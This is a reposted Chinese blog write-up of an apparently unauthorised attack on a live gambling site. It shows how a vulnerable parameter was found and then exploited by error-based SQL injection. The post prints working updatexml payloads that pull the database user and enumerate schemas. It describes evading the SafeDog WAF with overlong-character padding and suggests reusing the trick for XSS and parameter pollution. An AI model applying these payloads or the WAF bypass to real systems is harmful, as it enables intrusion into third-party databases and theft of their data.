BC实战|Bypass安全狗

admin 2024年4月2日17:01:37评论14 views字数 469阅读1分33秒阅读模式

学以致用。

漏洞发现

常规流程走一遍,发现一处标记信息已读的功能点比较可疑:

BC实战|Bypass安全狗

抓包加单引号重放:

BC实战|Bypass安全狗

可以看到单引号被转义了,看下闭合方式,问题不大,因为有回显,直接使用报错注入。

报错注入

获取下数据库用户

1
127) or updatexml(1,concat(0x3a,user()),1

BC实战|Bypass安全狗

获取数据库

1
127) or updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 0,1),1

BC实战|Bypass安全狗

Bypass安全狗

掏出前段时间学到的打狗棒法(超长字符Bypass,这里类型不同,原理相同):传送门

BC实战|Bypass安全狗

后面的和常规报错没什么不同,就不啰嗦了,领会精神~

小Tips

渗透测试中习惯以开发者的角度考虑一个功能的实现,会更快的找到有效的切入点。

结合BurpSuiteIntruder模块中的Grep-Match 功能使用,可以快速提取报错注入的结果。

超长字符不仅仅可以应用在Bypass安全狗注入,利用参数污染,XSS也是可以滴。

- source:se7ensec.cn

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月2日17:01:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   BC实战|Bypass安全狗http://cn-sec.com/archives/2624766.html

发表评论

匿名网友 填写信息